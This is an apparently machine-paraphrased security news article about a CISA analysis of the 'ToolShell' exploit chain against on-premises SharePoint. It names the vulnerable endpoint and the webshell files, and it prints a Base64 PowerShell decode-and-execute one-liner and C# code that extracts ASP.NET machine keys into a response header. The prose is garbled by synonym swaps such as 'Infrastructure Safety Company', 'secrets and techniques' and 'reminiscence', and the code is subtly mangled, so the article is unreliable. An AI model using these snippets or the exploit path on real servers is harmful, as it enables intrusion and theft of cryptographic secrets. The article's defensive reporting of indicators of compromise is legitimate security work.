The U.S. Cybersecurity and Infrastructure Safety Company (CISA) launched an pressing evaluation in early July 2025, detailing a complicated exploit chain concentrating on on-premises Microsoft SharePoint servers.
Dubbed “ToolShell,” the marketing campaign leverages two recent vulnerabilities—CVE-2025-49706, a community spoofing flaw, and CVE-2025-49704, a distant code execution weak point—to realize unauthorized entry and set up stealthy webshells.
Preliminary compromise begins with a crafted request to SharePoint’s modifying interface, invoking /_layouts/15/ToolPane.aspx?DisplayMode=Edit, which bypasses authentication checks and installs a malicious ASPX payload.
CISA analysts famous that when the attacker good points shell entry, they chain a DLL-based machine key extractor—encoded as Base64—to reap cryptographic secrets and techniques from the ASP.NET configuration.
The extracted keys are exfiltrated by injecting a customized HTTP header named X-TXT-NET into each response, facilitating distant decryption of protected ViewState and cookie values.
Detection signatures incorporate the distinctive header and related DLL hashes, enabling speedy identification of trailing infections.
In line with CISA researchers, the ultimate stage deploys a multi-function webshell (info3.aspx) that helps interactive command execution, file uploads, and credential harvesting by way of a challenge-response login type.
Attackers submit PowerShell instructions by way of Base64-encoded strings:-
$encoded = “JABiAGEAcwBlADYANABTAHQ…”
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded)) | iex
This snippet decodes the payload and executes it in reminiscence, leaving minimal forensic footprints. The result’s a persistent foothold that evades easy AV detection by avoiding disk writes.
ToolShell’s an infection mechanism hinges on abusing SharePoint’s customization options.
The attacker submits a POST request to spinstall0.aspx, inflicting the server to put in writing info3.aspx into the TEMPLATELAYOUTS listing. As soon as deployed, info3.aspx decodes one other Base64 DLL (bjcloiyq.dll) to retrieve machine key parameters:-
var part = (MachineKeySection)WebConfigurationManager.GetSection(“system. Net/machineKey”);
var headerValue = $”{part.ValidationKey}|{part.DecryptionKey}”;
Response.Headers.Add(“X-TXT-NET”, headerValue);
This code, extracted by way of reflection, exfiltrates secrets and techniques that attackers later leverage to forge legitimate SharePoint cookies and bypass authentication completely.
Persistence is ensured by chaining extra ASPX shells (spinstallb.aspx and spinstallp.aspx) that implement XOR-based payload decryption and re-encoding for command and management.
Steady monitoring of the disclosed IOC record—together with ASPX filenames, DLL SHA-256 hashes, and the X-TXT-NET header—is essential for defenders to detect and disrupt ToolShell’s stealthy operations.
Equip your SOC with full entry to the newest risk information from ANY.RUN TI Lookup that may Enhance incident response -> Get 14-day Free Trial
